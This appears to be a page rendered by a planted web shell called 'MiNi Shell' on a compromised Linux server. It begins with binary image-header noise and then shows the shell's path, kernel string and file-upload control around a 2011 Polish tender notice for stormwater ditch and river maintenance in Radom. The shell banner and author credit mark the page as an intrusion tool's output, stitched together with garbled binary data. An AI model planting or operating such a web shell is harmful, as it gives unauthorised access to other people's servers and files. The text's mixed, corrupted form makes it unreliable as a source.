JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110513/112786-N-2011.html

<p class="kh_header"><b>Radom: Utrzymanie i konserwacja otwartych systemów kanalizacji deszczowej na terenie miasta Radomia w roku 2011</b><br>
<b>Numer ogłoszenia: 112786 - 2011; data zamieszczenia: 13.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wodociągi Miejskie w Radomiu Sp. z o.o. , ul. Filtrowa 4, 26-600 Radom, woj. mazowieckie, tel. 048 3831602, faks 048 3831601.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wodociagi.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie i konserwacja otwartych systemów kanalizacji deszczowej na terenie miasta Radomia w roku 2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie polegać będzie na wykonaniu niżej wymienionych prac: UTRZYMANIE POTOKU PÓŁNOCNEGO w RADOMIU dł. ok. 4800 mb.Przywrócenie przepustowości koryta poprzez :- usunięcie z koryta rzeki zalegających namułów lokalnych, kamieni, wyławianie z wody i ze skarp nieczystości stałych, ich wywóz na wysypisko komunalne - oczyszczanie wylotów kanalizacji deszczowej i krat zamontowanych na tych wylotach - wykaszanie porostów po przekroczeniu przez nie wysokości 30 cm wraz z  ich wygrabieniem i wywózką na wysypisko komunalne -wykonania w miarę potrzeb darniowania, opasek z kiszki faszynowej i obsiew mieszanką traw -wycinkę zakrzaczeń, wiatrołomów z koryta z wywózką na wysypisko komunalne - remont istniejących umocnień kamiennych skarp i dna rzeki w miarę potrzeb -zabudowa powstałych wyrw ziemią lub narzutem kamiennym w miarę potrzeb - stały monitoring czystości  przekroju koryta rzeki. Pow. dna - 4800 m2, Pow. skarp(3mb + 3mb) x 4800 mb     = 28.800 m2, Pow. pobocza - 9.600 m2.Razem :43.200 m2. 3 (trzykrotne koszenie) = 109.600 m2.T/2509/02/02 - ręczne usuwanie namułu na odcinku 1000mb, warstwą 0,20 m 0,26 x 1000 mb = 260 rg. UTRZYMANIE  rowów - elementów otwartej kanalizacji deszczowej miasta Radomia - dł. ok. 25.480 mb.Przedmiot  zamówienia obejmuje :Przywrócenie przepustowości koryta poprzez : -  usunięcie z koryt rowów zalegających przymulisk, kamieni, wyławianie    z wody  nieczystości stałych, ich wywóz na wysypisko komunalne, -oczyszczanie wylotów kanalizacji deszczowej i krat zamontowanych na tych wylotach wraz z odmulaniem istniejących osadników, -wykaszanie porostów po przekroczeniu przez nie wysokości 30 cm wraz    z ich wygrabianiem i wywózką na wysypisko komunalne, -oczyszczanie z namułu przepustów rurowych, -wycinkę zakrzaczeń, wiatrołomów z wywózką na wysypisko komunalne, - stały monitoring czystości przekroju koryta cieków.Powierzchnia skarp- 24.480 m x 4m = 97.920 m2 Powierzchnia dna   -  24.480 m2 Powierzchnia pob.(1+1)x 24480 mb = 48.960 m2 RAZEM :   171.360 m2.1.Odbudowa przepustów w ul.Banacha 81,dz.1/2, 2x O 1200 x 6 mb 2. Odmulenie rowu po śladzie istniejącego rowu w ul. Oleńki 1200 mb. 1200 mb x 1,5 x 1 = 1800 m3
WYKAZ rowów i kanałów stanowiących element otwartej kanalizacji deszczowej w Radomiu objętych utrzymaniem i konserwacją w 2011 r :1.Rów od ul. Orzechowej do ul. Jarzynowej -  1260 mb 2.Rów od ul. Spadzistej do ul.Kieleckiej DALIA -280mb 3.Rów przy Stawie Malczewskim -  100 mb 4.Rów w ul.Czarnej -360 mb 5.Rów w ul. Tartacznej-  200 mb 6.Rów w ul. Jaworowej(Dębowa) -  200 mb 7.Rów w ul. Czarnieckiego-Langiewicza- 300 mb 8.Rów w ul. Jagodowej- 100 mb 9.Rów od ul. Jagodowej (od ujęcia Malczew-  260 mb 10.Rów przy ul. Mieszka I- 200 mb 11.Rów ul.Idalińskiej- 100 mb 12.Rów od ul. Skrzydlatej do ul. Źródłowej- 3050 mb 13.Rów w ul. Jodłowej-  100 mb 14.Rów z osadnikiem w ul. Suchej- 200 mb 15.Rów w ul. Małęczyńskiej (przy torach do lotniska)-  250 mb 16.Rów przy ul. Krychnowickiej- 100 mb 17.Rów z osadnikiem w ul. Parkowej-  50 mb 18.Rów w ul. Miodowej- 50 mb 19.Rów od ul. Bulwarowj do ul. Kieleckiej- 550 mb 20.Rów  od Ujęcia Sławno- 470 mb 21.Rowy przy ul. Północnej- 200 mb 22.Rów R-1 do ul. Wojska Polskiego- 150 mb Razem rowy : 8530 mb 23.Rów (Ciek Brzustowski)- 3600 mb 24.Rów od ul. Rumiankowej- 1800 mb 25. Rów w ul. Mlecznej- 1200 mb 26. Rów w ul. Tęczowej- 800  mb 27. Rów od ul. Hodowlanej- 1000 mb 28. Rów od Wólki Klwateckiej- 1200 mb 29. Rów w Dębowej- 800 mb 30. Rów od Trablic- 1500 mb 31. Rów od ul.Łączna/Głucha  PKP- 600 mb 32. Rów w ul. Oleńki- 1200 mb 33.Rów w ul. Orkana- 400 mb 34. Rów w ul Chabrowej- 900 mb 35 .Rów od ul. Jastrzębskiego- 450 mb 36. Rów od ul. Przytyckiej do Langiewicza- 1600 mb 37. Rów od ul. Szlacheckiej-   300 mb Razem rowy :  17.350 mb OGÓŁEM : 25.880 mb UTRZYMANIE AKWENÓW WODNYCH NA TERENIE MIASTA RADOMIA Przedmiot  zamówienia obejmuje :Utrzymanie w czystości i drożności akwenów wodnych tj. osadników wód deszczowych, piaskowników i oczek wodnych zlokalizowanych na terenie miasta Radomia w/g poniższego wykazu :1.Osadnik Źródłowa - ul. Żródłowa 2.Osdadnik Michałów - ul. Łokietka 3.Osadnik Kozia Góra - ul.Nowomaratońska 4.Osadnik Godowska - ul. Wiejska 5.Osadnik Józefów - ul. Aleksandrowicza 6.Osadnik Rybna - ul. Rybna 7.Osadnik Konopna - ul. Szarych Szeregów 8. Osadnik Parkowa - ul Parkowa 9. Zbiornik Ustronie - ul. Jana Pawła II 10. Zbiornik Ustronie - ul. Orzechowa 11.Oczko Stary Ogród - ul. Mireckiego 12.Oczko Park Gołębiów - ul. Hallera 13. Osadnik Witosa - ul. Witosa 14.Osadnik Planowa-Garbarska
Łączna powierzchnia wykoszenia jednorazowego 31.805 m2, Utrzymanie w czystości i drożności akwenów wodnych na terenie miasta Radomia wykonywane winno być poprzez : -usunięcie z obszaru każdego z akwenów - łącznie z lustrem wody-śmieci, gałęzi  itp. -oczyszczanie wlotów, wylotów oraz krat zamontowanych na nich -usuwanie z elementów betonowych piasku, namułu i innych nieczystości -wykaszanie skarp i terenów przyległych wraz    z wygrabieniem i wywozem na wysypisko komunalne -czyszczenie i raz w roku malowanie barierek  elementów stalowych urządzeń piętrzących.2 x 31.805 m2 =  (dwukrotne koszenie) = 63.610,00 m2  UTRZYMANIE RZEKI MLECZNEJ w granicach administracyjnych RADOMIA dł. ok. 17100 mb Przedmiot zamówienia obejmuje: Przywrócenie przepustowości koryta poprzez :- usunięcie z koryta rzeki zalegających namułów lokalnych, kamieni, wyławianie z wody i ze skarp nieczystości stałych, ich wywóz na wysypisko komunalne -oczyszczanie wylotów kanalizacji deszczowej i krat zamontowanych na tych wylotach -Oczyszczanie z namułu przepustów rurowych - wykaszanie porostów po przekroczeniu przez nie wysokości 30 cm wraz z  ich wygrabieniem i wywózką na wysypisko komunalne -wykonania w miarę potrzeb darniowania, opasek z kiszki faszynowej i obsiew mieszanką traw -wycinkę zakrzaczeń, wiatrołomów z wywózką na wysypisko komunalne -remont istniejących umocnień kamiennych skarp i dna rzeki w miarę potrzeb-stały monitoring czystości  przekroju koryta rzeki.Powierzchnia skarp (4m+4m)-  136.800 m2 Powierzchnia pob.1+1 -  24.400 m2 RAZEM :   161.200 m2 KNNR - 10 - T2508/05  (dwukrotne koszenie) 270.300,00 m2 KNNR - 10 - T2508/05 T/2509/02/02 - ręczne usuwanie namułu na odcinku 2000mb, warstwą 0,20 m szerokość dna do 4.0 m 1,19 x 2000 mb = 2380 rg - usunięcie mechaniczne przymulisk i zatorów :2710 mb 2710 x 2,0 x 0,3 = 1626,00 m3 UTRZYMANIE RZEKI CEREKWIANKI w RADOMIU dł. ok. 2370 mb.Przedmiot zamówienia obejmuje:Przywrócenie przepustowości koryta poprzez : -usunięcie z koryta rzeki zalegających namułów lokalnych, kamieni, wyławianie z wody i ze skarp nieczystości stałych, ich wywóz na wysypisko komunalne -oczyszczanie wylotów kanalizacji deszczowej i krat zamontowanych na tych wylotach -wykaszanie porostów po przekroczeniu przez nie wysokości 30 cm wraz z  ich wygrabieniem i wywózką na wysypisko komunalne -wykonania w miarę potrzeb darniowania, opasek z kiszki faszynowej i obsiew mieszanką traw -wycinkę zakrzaczeń, wiatrołomów z koryta z wywózką na wysypisko komunalne- remont istniejących umocnień kamiennych skarp i dna rzeki w miarę potrzeb -zabudowa powstałych wyrw ziemią lub narzutem kamiennym w miarę potrzeb -stały monitoring czystości  przekroju koryta rzeki. Pow. dna  1 mb- 2370 m2 Pow. skarp(3mb + 3mb) x 2370 mb =14.220 m2
Pow. pobocza (1+1) x 2370 mb =4740 m2 RAZEM : 21.330 m2 21.330 m2     x 2 (dwukrotne koszenie) = 42.660 m2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.72.22.00-6, 90.73.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawcy zobowiązani są do zabezpieczenia swojej oferty wadium w wysokości: 5.000,00 zł (pięć tysięcy zł)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się wykonaniem w okresie ostatnich trzech lat licząc od dnia składania  ofert  , a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jedną usługę polegającą na  konserwacji otwartych systemów kanalizacji deszczowej (rzek, potoków, rowów itp.)  Ww. dokumenty mogą być wystawione przez bezpośredniego Inwestora (odbiorcę wykonanych usług) lub głównego Wykonawcę w przypadku, gdyWykonawca ubiegający się o udzielenie zamówienia realizował usługi ,których dotyczą powyższe dokumenty, jako Podwykonawca zatwierdzony przez Inwestora. Przy dokonaniu oceny spełnienia warunku Zamawiający będzie się kierował zasadą spełnia -niespełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi udokumentować, że 	zatrudnia średniorocznie (średnia w skali roku) w okresie ostatnich trzech lat licząc od dnia otwarcia ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 12 pracowników oraz, że dysponuje lub będzie dysponował następującym sprzętem Koparka - 1 szt. , samochód samowyładowczy - 1 szt.  samochód osobowo-towarowy do przewozu osób i sprzętu - 2 szt. Przy dokonaniu oceny spełnienia warunku Zamawiający będzie się kierował zasadą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.woda.radom.pl, www.wodociągi.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wodociągi Miejskie w Radomiu Sp. z o.o., 26-600 Radom ul. Filtrowa 4, Dział Zamówień Publicznych, pok. 414.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2011 godzina 08:00, miejsce: Wodociągi Miejskie w Radomiu Sp. z o.o., 26-600 Radom, ul. Filtrowa 4, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com